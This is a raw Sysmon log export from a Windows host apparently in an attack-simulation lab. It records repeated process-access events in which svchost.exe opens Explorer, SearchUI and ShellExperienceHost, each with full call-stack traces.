09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056796Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056795Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056794Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056793Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056792Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056791Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056790Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056789Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056788Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056787Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056786Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056785Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056784Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056783Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056782Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056781Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056780Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056779Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056778Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056777Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056776Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056775Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056774Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056773Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056772Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056771Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056770Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056769Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056768Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056767Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056766Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056765Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 